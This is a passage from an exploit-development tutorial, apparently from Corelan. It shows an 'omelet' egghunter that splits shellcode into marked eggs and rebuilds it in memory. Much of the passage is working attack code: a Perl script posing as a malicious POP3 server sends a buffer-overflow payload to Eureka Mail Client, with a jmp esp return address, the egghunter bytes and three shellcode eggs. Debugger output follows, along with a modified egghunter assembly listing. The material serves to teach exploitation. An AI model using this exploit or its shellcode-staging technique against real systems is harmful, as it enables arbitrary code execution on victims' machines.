#0000ff;\">close<\/span>(FILE);\n<span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\">Wrote <\/span>\".<span style=\"color: #0000ff;\">length<\/span>($shellcode).\"<span style=\"color: #8b0000;\"> bytes to file <\/span>\".$scfile.\"<span style=\"color: #8b0000;\">\\n<\/span>\";<\/pre>\n<p>Run the script. File shellcode.bin now contains the binary shellcode. 
(Of course, if you want something other than calc, just replace the contents of $shellcode.)<\/p>\n<p>&nbsp;<\/p>\n<p><strong><span style=\"text-decoration: underline;\">2. Convert the shellcode to eggs <\/span><\/strong><\/p>\n<p>Let\u2019s say we have figured out that we have several chunks of about 130 bytes of memory space at our disposal. So we need to cut the 303 bytes of code into 3 eggs (plus the 5-byte header on each egg, so we could end up with 3 or 4 eggs).\u00a0 The maximum size of each egg is 127 bytes, header included. We also need a 3-byte marker. We\u2019ll use 0xBADA55 as marker.<\/p>\n<p>Run the script without arguments to see its syntax :<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\">C:\\omelet&gt;w32_SEH_omelet.py\nSyntax:\n    w32_SEH_omelet.py \"<span style=\"color: #8b0000;\">omelet bin file<\/span>\" \"<span style=\"color: #8b0000;\">shellcode bin file<\/span>\" \"<span style=\"color: #8b0000;\">output txt file<\/span>\"\n        [egg size] [marker bytes]\n\nWhere:\n    omelet bin file = The omelet shellcode stage binary code followed by three\n                      bytes of the offsets of the \"<span style=\"color: #8b0000;\">marker bytes<\/span>\", \"<span style=\"color: #8b0000;\">max index<\/span>\"\n                      and \"<span style=\"color: #8b0000;\">egg size<\/span>\" variables in the code.\n    shellcode bin file = The shellcode binary code you want to have stored in\n                      the eggs and reconstructed by the omelet shellcode stage\n                      code.\n    output txt file = The file you want the omelet egg-hunt code and the eggs\n                      to be written to (in text <span style=\"color: #0000ff;\">format<\/span>).\n    egg size =        The size of <span style=\"color: #0000ff;\">each<\/span> egg (legal <span style=\"color: #0000ff;\">values<\/span>: 6-127, default: 127)\n    marker bytes =    The <span style=\"color: 
#0000ff;\">value<\/span> you want to <span style=\"color: #0000ff;\">use<\/span> as a marker to distinguish the\n                      eggs from other data in user-land address space (legal\n                      <span style=\"color: #0000ff;\">values<\/span>: 0-0xFFFFFF, default <span style=\"color: #0000ff;\">value<\/span>: 0x280876)<\/pre>\n<p>=&gt; in our case, the command could be :<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\">C:\\omelet&gt;w32_SEH_omelet.py w32_omelet.bin shellcode.bin calceggs.txt 127 0xBADA55<\/pre>\n<p>Open the newly created file calceggs.txt. It contains<\/p>\n<p>- the omelet egghunter code (which should be executed and will hunt for the eggs)<\/p>\n<p>- the eggs that must be placed somewhere in memory.<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image18.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb18.png\" alt=\"image\" width=\"573\" height=\"445\" border=\"0\" \/><\/a><\/p>\n<p>If you look closer at the eggs, you\u2019ll see that<\/p>\n<p>- the first 5 bytes contain the size of the egg data (0x7A = 122), the index (0xFF - 0xFE - 0xFD), and the marker (0x55,0xDA,0xBA, i.e. 0xBADA55 stored little-endian).\u00a0\u00a0 122 + 5 bytes header = 127 bytes<\/p>\n<p>- the next bytes in the egg are taken from the original shellcode from our calc.exe payload<\/p>\n<p>- in the last egg, the remaining space is filled with 0x40<\/p>\n<p><strong><span style=\"text-decoration: underline;\">3. Build the exploit<\/span><\/strong><\/p>\n<p>Let\u2019s test this concept in our Eureka Mail Client exploit. 
We\u2019ll put some garbage between the eggs to simulate that the eggs were placed at random locations in memory :<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\"><span style=\"color: #0000ff;\">use<\/span> Socket;\n#fill out the <span style=\"color: #0000ff;\">local<\/span> IP or hostname\n#which is used by Eureka EMail as <span style=\"color: #0000ff;\">POP<\/span>3 server\n#note : must be exact match !\n<span style=\"color: #0000ff;\">my<\/span> $localserver = \"<span style=\"color: #8b0000;\">192.168.0.193<\/span>\";\n#calculate <span style=\"color: #0000ff;\">offset<\/span> to EIP\n<span style=\"color: #0000ff;\">my<\/span> $junk = \"<span style=\"color: #8b0000;\">A<\/span>\" x (723 - <span style=\"color: #0000ff;\">length<\/span>($localserver));\n<span style=\"color: #0000ff;\">my<\/span> $ret=<span style=\"color: #0000ff;\">pack<\/span>('V',0x7E47BCAF); #jmp esp from user32.dll\n<span style=\"color: #0000ff;\">my<\/span> $padding = \"<span style=\"color: #8b0000;\">\\x90<\/span>\" x 1000;\n<span style=\"color: #0000ff;\">my<\/span> $omelet_code = \"<span style=\"color: #8b0000;\">\\x31\\xFF\\xEB\\x23\\x51\\x64\\x89\\x20\\xFC\\xB0\\x7A\\xF2<\/span>\".\n\"<span style=\"color: #8b0000;\">\\xAE\\x50\\x89\\xFE\\xAD\\x35\\xFF\\x55\\xDA\\xBA\\x83\\xF8\\x03\\x77\\x0C\\x59<\/span>\".\n\"<span style=\"color: #8b0000;\">\\xF7\\xE9\\x64\\x03\\x42\\x08\\x97\\xF3\\xA4\\x89\\xF7\\x31\\xC0\\x64\\x8B\\x08<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x89\\xCC\\x59\\x81\\xF9\\xFF\\xFF\\xFF\\xFF\\x75\\xF5\\x5A\\xE8\\xC7\\xFF\\xFF<\/span>\".\n\"<span style=\"color: #8b0000;\">\\xFF\\x61\\x8D\\x66\\x18\\x58\\x66\\x0D\\xFF\\x0F\\x40\\x78\\x06\\x97\\xE9\\xD8<\/span>\".\n\"<span style=\"color: #8b0000;\">\\xFF\\xFF\\xFF\\x31\\xC0\\x64\\xFF\\x50\\x08<\/span>\";\n\n<span style=\"color: #0000ff;\">my<\/span> $egg1 = \"<span style=\"color: 
#8b0000;\">\\x7A\\xFF\\x55\\xDA\\xBA\\x89\\xE2\\xDA\\xC1\\xD9\\x72\\xF4\\x58\\x50<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x59\\x49\\x49\\x49\\x49\\x43\\x43\\x43\\x43\\x43\\x43\\x51\\x5A\\x56\\x54\\x58\\x33<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x30\\x56\\x58\\x34\\x41\\x50\\x30\\x41\\x33\\x48\\x48\\x30\\x41\\x30\\x30\\x41\\x42<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x41\\x41\\x42\\x54\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\\x30\\x42\\x42\\x58<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x50\\x38\\x41\\x43\\x4A\\x4A\\x49\\x4B\\x4C\\x4A\\x48\\x50\\x44\\x43\\x30\\x43\\x30<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x45\\x50\\x4C\\x4B\\x47\\x35\\x47\\x4C\\x4C\\x4B\\x43\\x4C\\x43\\x35\\x43\\x48\\x45<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x51\\x4A\\x4F\\x4C\\x4B\\x50\\x4F\\x42\\x38\\x4C\\x4B\\x51\\x4F\\x47\\x50\\x43\\x31<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x4A\\x4B\\x51\\x59\\x4C\\x4B\\x46\\x54\\x4C\\x4B\\x43<\/span>\";\n\n<span style=\"color: #0000ff;\">my<\/span> $egg2 = \"<span style=\"color: #8b0000;\">\\x7A\\xFE\\x55\\xDA\\xBA\\x31\\x4A\\x4E\\x50\\x31\\x49\\x50\\x4C\\x59<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x4E\\x4C\\x4C\\x44\\x49\\x50\\x43\\x44\\x43\\x37\\x49\\x51\\x49\\x5A\\x44\\x4D\\x43<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x31\\x49\\x52\\x4A\\x4B\\x4A\\x54\\x47\\x4B\\x51\\x44\\x46\\x44\\x43\\x34\\x42\\x55<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x4B\\x55\\x4C\\x4B\\x51\\x4F\\x51\\x34\\x45\\x51\\x4A\\x4B\\x42\\x46\\x4C\\x4B\\x44<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x4C\\x50\\x4B\\x4C\\x4B\\x51\\x4F\\x45\\x4C\\x45\\x51\\x4A\\x4B\\x4C\\x4B\\x45\\x4C<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x4C\\x4B\\x45\\x51\\x4A\\x4B\\x4D\\x59\\x51\\x4C\\x47\\x54\\x43\\x34\\x48\\x43\\x51<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x4F\\x46\\x51\\x4B\\x46\\x43\\x50\\x50\\x56\\x45\\x34\\x4C\\x4B\\x47\\x36\\x50\\x30<\/span>\".\n\"<span style=\"color: 
#8b0000;\">\\x4C\\x4B\\x51\\x50\\x44\\x4C\\x4C\\x4B\\x44\\x30\\x45<\/span>\";\n\n<span style=\"color: #0000ff;\">my<\/span> $egg3 = \"<span style=\"color: #8b0000;\">\\x7A\\xFD\\x55\\xDA\\xBA\\x4C\\x4E\\x4D\\x4C\\x4B\\x45\\x38\\x43\\x38<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x4B\\x39\\x4A\\x58\\x4C\\x43\\x49\\x50\\x42\\x4A\\x50\\x50\\x42\\x48\\x4C\\x30\\x4D<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x5A\\x43\\x34\\x51\\x4F\\x45\\x38\\x4A\\x38\\x4B\\x4E\\x4D\\x5A\\x44\\x4E\\x46\\x37<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x4B\\x4F\\x4D\\x37\\x42\\x43\\x45\\x31\\x42\\x4C\\x42\\x43\\x45\\x50\\x41\\x41\\x40<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40<\/span>\";\n\n<span style=\"color: #0000ff;\">my<\/span> $garbage=\"<span style=\"color: #8b0000;\">This is a bunch of garbage<\/span>\" x 10;\n\n<span style=\"color: #0000ff;\">my<\/span> $payload=$junk.$ret.$omelet_code.$padding.$egg1.$garbage.$egg2.$garbage.$egg3;\n\n<span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\">Payload : <\/span>\" . <span style=\"color: #0000ff;\">length<\/span>($payload).\"<span style=\"color: #8b0000;\"> bytes\\n<\/span>\";\n<span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\">Omelet code : <\/span>\" . <span style=\"color: #0000ff;\">length<\/span>($omelet_code).\"<span style=\"color: #8b0000;\"> bytes\\n<\/span>\";\n<span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\"> Egg 1 : <\/span>\" . 
<span style=\"color: #0000ff;\">length<\/span>($egg1).\"<span style=\"color: #8b0000;\"> bytes\\n<\/span>\";\n<span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\"> Egg 2 : <\/span>\" . <span style=\"color: #0000ff;\">length<\/span>($egg2).\"<span style=\"color: #8b0000;\"> bytes\\n<\/span>\";\n<span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\"> Egg 3 : <\/span>\" . <span style=\"color: #0000ff;\">length<\/span>($egg3).\"<span style=\"color: #8b0000;\"> bytes\\n<\/span>\";\n\n#set up listener on port 110\n<span style=\"color: #0000ff;\">my<\/span> $port=110;\n<span style=\"color: #0000ff;\">my<\/span> $proto=<span style=\"color: #0000ff;\">getprotobyname<\/span>('tcp');\n<span style=\"color: #0000ff;\">socket<\/span>(SERVER,PF_INET,SOCK_STREAM,$proto);\n<span style=\"color: #0000ff;\">my<\/span> $paddr=sockaddr_in($port,INADDR_ANY);\n<span style=\"color: #0000ff;\">bind<\/span>(SERVER,$paddr);\n<span style=\"color: #0000ff;\">listen<\/span>(SERVER,SOMAXCONN);\n<span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\">[+] Listening on tcp port 110 [POP3]... 
\\n<\/span>\";\n<span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\">[+] Configure Eureka Mail Client to connect to this host \\n<\/span>\";\n<span style=\"color: #0000ff;\">my<\/span> $client_addr;\nwhile($client_addr=<span style=\"color: #0000ff;\">accept<\/span>(CLIENT,SERVER))\n{\n  <span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\">[+] Client connected, sending evil payload\\n<\/span>\";\n  while(1)\n  {\n     <span style=\"color: #0000ff;\">print<\/span> CLIENT \"<span style=\"color: #8b0000;\">-ERR <\/span>\".$payload.\"<span style=\"color: #8b0000;\">\\n<\/span>\";\n\t <span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\"> -&gt; Sent <\/span>\".<span style=\"color: #0000ff;\">length<\/span>($payload).\"<span style=\"color: #8b0000;\"> bytes\\n<\/span>\";\n  }\n}\n<span style=\"color: #0000ff;\">close<\/span> CLIENT;\n<span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\">[+] Connection closed\\n<\/span>\";<\/pre>\n<p>Run the script :<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\">C:\\sploits\\eureka&gt;perl corelan_eurekasploit4.pl\nPayload     : 2700 bytes\nOmelet code : 85 bytes\n      Egg 1 : 127 bytes\n      Egg 2 : 127 bytes\n      Egg 3 : 127 bytes\n[+] Listening on tcp port 110 [<span style=\"color: #0000ff;\">POP<\/span>3]...\n[+] Configure Eureka Mail Client to <span style=\"color: #0000ff;\">connect<\/span> to this host<\/pre>\n<p>Result : Access Violation when reading [00000000]<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image36.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb36.png\" alt=\"image\" width=\"322\" height=\"186\" border=\"0\" 
\/><\/a><\/p>\n<p>When looking closer at the code, we see that the first instruction of the omelet code puts 00000000 in EDI (\\x31\\xFF = XOR EDI,EDI). When it starts reading at that address, we get an access violation. Despite the fact that the code uses custom SEH injection to handle access violations, this one was not handled and the exploit fails.<\/p>\n<p>Set a breakpoint at jmp esp (0x7E47BCAF) and run the exploit again.\u00a0 Take note of the registers when the jump to esp is made :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image37.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb37.png\" alt=\"image\" width=\"326\" height=\"171\" border=\"0\" \/><\/a><\/p>\n<p>Ok, let\u2019s troubleshoot this. Start by locating the eggs in memory. After all, perhaps we can put another start address in EDI (other than zero), based on one of these registers and the place where the eggs are located, allowing the omelet code to work properly.<\/p>\n<p>First, write the 3 eggs to files (add the following lines of code in the exploit, before the listener is set up; the binmode call keeps Perl on Windows from turning any 0x0A byte in an egg into 0x0D 0x0A, which would corrupt the file you compare against):<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\"><span style=\"color: #0000ff;\">open<\/span>(FILE,\"<span style=\"color: #8b0000;\">&gt;c:\\\\tmp\\\\egg1.bin<\/span>\");\n<span style=\"color: #0000ff;\">binmode<\/span>(FILE);\n<span style=\"color: #0000ff;\">print<\/span> FILE $egg1;\n<span style=\"color: #0000ff;\">close<\/span>(FILE);\n\n<span style=\"color: #0000ff;\">open<\/span>(FILE,\"<span style=\"color: #8b0000;\">&gt;c:\\\\tmp\\\\egg2.bin<\/span>\");\n<span style=\"color: #0000ff;\">binmode<\/span>(FILE);\n<span style=\"color: #0000ff;\">print<\/span> FILE $egg2;\n<span style=\"color: #0000ff;\">close<\/span>(FILE);\n\n<span style=\"color: #0000ff;\">open<\/span>(FILE,\"<span style=\"color: #8b0000;\">&gt;c:\\\\tmp\\\\egg3.bin<\/span>\");\n<span style=\"color: #0000ff;\">binmode<\/span>(FILE);\n<span style=\"color: #0000ff;\">print<\/span> FILE $egg3;\n<span style=\"color: #0000ff;\">close<\/span>(FILE);<\/pre>\n<p>At the jmp esp breakpoint, run the following commands :<\/p>\n<p>!pvefindaddr compare c:\\tmp\\egg1.bin<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image38.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb38.png\" alt=\"image\" width=\"385\" height=\"150\" border=\"0\" \/><\/a><\/p>\n<p>!pvefindaddr compare c:\\tmp\\egg2.bin<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image39.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb39.png\" alt=\"image\" width=\"383\" height=\"154\" border=\"0\" \/><\/a><\/p>\n<p>!pvefindaddr compare c:\\tmp\\egg3.bin<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image40.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb40.png\" alt=\"image\" width=\"391\" height=\"152\" border=\"0\" \/><\/a><\/p>\n<p>Ok, so the 3 eggs are found in memory, and are not corrupted.<\/p>\n<p>Look at the addresses.\u00a0 One copy is found on the stack (0x0012????), other copies are elsewhere in memory (0x0047????). 
When we look back at the registers, taking into account that we need to find a register that is reliable, and positioned before the eggs, we see the following :<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\">EAX 00000000\nECX 7C91005D ntdll.7C91005D\nEDX 00140608\n<strong><span style=\"color: #ff0000;\">EBX 00450266 Eureka_E.00450266<\/span><\/strong>\nESP 0012CD6C\nEBP 00475BFC Eureka_E.00475BFC\nESI 00475BF8 Eureka_E.00475BF8\n<strong><span style=\"color: #ff0000;\">EDI 00473678<\/span><\/strong> ASCII \"<span style=\"color: #8b0000;\">AAAAAAAAAAAAA<\/span>\"\nEIP 0012CD6C\nC 0  ES 0023 32bit 0(FFFFFFFF)\nP 0  CS 001B 32bit 0(FFFFFFFF)\nA 0  SS 0023 32bit 0(FFFFFFFF)\nZ 0  DS 0023 32bit 0(FFFFFFFF)\nS 0  FS 003B 32bit 7FFDF000(FFF)\nT 0  GS 0000 NULL\nD 0\nO 0  LastErr ERROR_INVALID_WINDOW_HANDLE (00000578)\nEFL 00000202 (NO,NB,NE,A,NS,PO,GE,G)\nST0 empty -UNORM FB18 00000202 0000001B\nST1 empty -UNORM B7FC 00000000 F894BBD0\nST2 empty -UNORM A70E 06D90000 0120027F\nST3 empty +UNORM 1F80 00400000 BF8131CE\nST4 empty %#.19L\nST5 empty -UNORM CCB4 00000286 0000001B\nST6 empty 9.5000000000000000000\nST7 empty 19.000000000000000000\n               3 2 1 0      E S P U O Z D I\nFST 0120  Cond 0 0 0 1  Err 0 0 1 0 0 0 0 0  (LT)\nFCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1<\/pre>\n<p>EBX may be a good choice.\u00a0 But EDI is even better because it already contains a good address, located before the eggs.\u00a0\u00a0\u00a0 That means that we just have to leave the current value of EDI (instead of clearing it out) to reposition the omelet hunter.\u00a0\u00a0 Quick fix : replace the xor edi,edi instruction with 2 nops. Keep in mind that this ties the start of the search to whatever EDI happens to hold at the moment of the jmp esp (here 0x00473678, inside a copy of our junk buffer, below the eggs), so it has to be re-verified whenever the payload layout or the crash changes.<\/p>\n<p>The changed omelet code in the exploit now looks like this :<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\"><span style=\"color: #0000ff;\">my<\/span> $omelet_code = 
\"<span style=\"color: #8b0000;\">\\<strong><span style=\"color: #ff0000;\">x90\\x90<\/span><\/strong>\\xEB\\x23\\x51\\x64\\x89\\x20\\xFC\\xB0\\x7A\\xF2<\/span>\".\n\"<span style=\"color: #8b0000;\">\\xAE\\x50\\x89\\xFE\\xAD\\x35\\xFF\\x55\\xDA\\xBA\\x83\\xF8\\x03\\x77\\x0C\\x59<\/span>\".\n\"<span style=\"color: #8b0000;\">\\xF7\\xE9\\x64\\x03\\x42\\x08\\x97\\xF3\\xA4\\x89\\xF7\\x31\\xC0\\x64\\x8B\\x08<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x89\\xCC\\x59\\x81\\xF9\\xFF\\xFF\\xFF\\xFF\\x75\\xF5\\x5A\\xE8\\xC7\\xFF\\xFF<\/span>\".\n\"<span style=\"color: #8b0000;\">\\xFF\\x61\\x8D\\x66\\x18\\x58\\x66\\x0D\\xFF\\x0F\\x40\\x78\\x06\\x97\\xE9\\xD8<\/span>\".\n\"<span style=\"color: #8b0000;\">\\xFF\\xFF\\xFF\\x31\\xC0\\x64\\xFF\\x50\\x08<\/span>\";<\/pre>\n<p>Run the exploit again, (Eureka still attached to Immunity Debugger, and with breakpoint on jmp esp again). Breakpoint is hit, press F7 to start tracing. You should see the omelet code start (with 2 nops this time), and instruction \u201cREPNE SCAS BYTE PTR ES:[EDI]\u201d will continue to run until an egg is found.<\/p>\n<p>Based on the output of another \u201c!pvefindaddr compare c:\\tmp\\egg1.bin\u201d command, we should find the egg at 0x00473C5C<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image41.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb41.png\" alt=\"image\" width=\"660\" height=\"441\" border=\"0\" \/><\/a><\/p>\n<p>When the first tag is found (and verified to be correct), a location on the stack is calculated (0x00126000 in my case), and the shellcode after the tag is copied to that location. 
ECX is now used as a counter (counts down to 0) so only the shellcode is copied and the omelet can continue when ECX reaches 0.<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image42.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb42.png\" alt=\"image\" width=\"433\" height=\"266\" border=\"0\" \/><\/a><\/p>\n<p>When the shellcode in egg1 is copied, (and we can see the garbage after egg1), the omelet code continues its search for part 2<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image43.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb43.png\" alt=\"image\" width=\"461\" height=\"338\" border=\"0\" \/><\/a><\/p>\n<p>This process repeats itself until all eggs are found and written on the stack.\u00a0 Instead of stopping the search, the omelet code just continues the search\u2026\u00a0 Result : we end up with an access violation again :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image44.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb44.png\" alt=\"image\" width=\"523\" height=\"103\" border=\"0\" \/><\/a><\/p>\n<p>So, we know that the omelet code ran properly (we should be able to find the entire shellcode in memory somewhere), but it did not stop when it had to.\u00a0 First, verify that the shellcode in memory is indeed an exact copy of the original shellcode.<\/p>\n<p>We still have the shellcode.bin file that was created earlier (when building the omelet code). 
Copy the file to c:\\tmp and run this command in Immunity Debugger :<\/p>\n<p>!pvefindaddr compare c:\\tmp\\shellcode.bin<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image45.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb45.png\" alt=\"image\" width=\"446\" height=\"471\" border=\"0\" \/><\/a><\/p>\n<p>OK, the entire unmodified shellcode was indeed found at 0x00126000. That\u2019s great, because it proves that the omelet worked fine\u2026 it just did not stop searching, tripped at the end, fell flat on the floor and died.<\/p>\n<p>Damn.<\/p>\n<h4>Fixing the omelet code - welcome corelanc0d3r\u2019s omelet<\/h4>\n<p>Since the eggs are in the right order in memory, perhaps a slight modification of the omelet code may make it work. What if we use one of the registers to keep track of the remaining number of eggs to find, and make the code jump to the shellcode when this register indicates that all eggs have been found?<\/p>\n<p>Let\u2019s give it a try (Although I\u2019m not a big asm expert, I\u2019m feeling lucky today \ud83d\ude42 )<\/p>\n<p>We need to start the omelet code by creating a start value that will be used to count the number of eggs found : 0 - the number of eggs, which is the same as 0xFFFFFFFF - the number of eggs + 1 (so if we have 3 eggs, we\u2019ll use FFFFFFFD). After looking at the omelet code (in the debugger), I\u2019ve noticed that EBX is not used, so we\u2019ll store this value in EBX.<\/p>\n<p>Next, what I\u2019ll make the omelet code do is this : each time an egg is found, increment this value by one.\u00a0 When the value is FFFFFFFF, all eggs have been found, so we can make the jump. (The check runs after each egg has been copied and before the increment, so with 3 eggs EBX starts at FFFFFFFD, becomes FFFFFFFE after the first egg and FFFFFFFF after the second, and the jump is taken right after the third egg has been copied.)<\/p>\n<p>Opcode for putting 0xFFFFFFFD in EBX is \\xbb\\xfd\\xff\\xff\\xff. 
So we\u2019ll need to start the omelet code with this instruction.<\/p>\n<p>Then, after the shellcode from a given egg has been copied to the stack, we need to check whether all eggs have been seen : compare EBX with FFFFFFFF; if they are equal, jump to the shellcode, otherwise increment EBX. The copy to the stack is performed by the instruction F3:A4 (REP MOVSB), so the check and the increment must be placed right after it.<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image46.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb46.png\" alt=\"image\" width=\"362\" height=\"80\" border=\"0\" \/><\/a><\/p>\n<p>Right after this instruction, we\u2019ll insert the compare, the jump if equal, and \u201cINC EBX\u201d\u00a0 (\\x43).<\/p>\n<p>Let\u2019s modify the master asm code :<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\">BITS 32\n\n; egg:\n; LL II M1 M2 M3 DD DD DD ... (LL * DD)\n; LL == Size of eggs (same for all eggs)\n; II == Index of egg (different for each egg)\n; M1,M2,M3 == Marker byte (same for all eggs)\n; DD == Data in egg (different for each egg)\n\n; Original code by skylined\n; Code tweaked by Peter Van Eeckhoutte\n; peter.ve[at]corelan.be\n; https:\/\/www.corelan.be\n\nmarker equ 0x280876\negg_size equ 0x3\nmax_index equ 0x2\nstart:\n<strong><span style=\"color: #ff0000;\">  mov     ebx, 0xffffffff-(max_index+1)+1 ; ** Added : initial counter in EBX =\n                                          ; **   0xFFFFFFFF - number of eggs + 1\n                                          ; **   (number of eggs == max_index + 1,\n                                          ; **   so 0xFFFFFFFD for 3 eggs). This value\n                                          ; **   is not one of the locations patched\n                                          ; **   by w32_SEH_omelet.py, so change it\n                                          ; **   here when the number of eggs changes<\/span><\/strong>\n  jmp     SHORT reset_stack\n\ncreate_SEH_handler:\n  PUSH    ECX                     ; SEH_frames[0].nextframe == 0xFFFFFFFF\n  MOV     [FS:EAX], ESP           ; SEH_chain -&gt; SEH_frames[0]\n  CLD                             ; SCAN memory upwards from 0\nscan_loop:\n  MOV     AL, egg_size            ; EAX = egg_size\negg_size_location equ $-1 - $$\n  REPNE   SCASB                   ; Find the first byte (LL)\n  PUSH    EAX                     ; Save egg_size\n  MOV     ESI, EDI\n  LODSD                           ; EAX = II M1 M2 M3\n  XOR     EAX, (marker &lt;&lt; 8) + 0xFF  ; EAX = (II M1 M2 M3) ^ (FF M1 M2 M3)\n                                  ;    == egg_index (when the marker 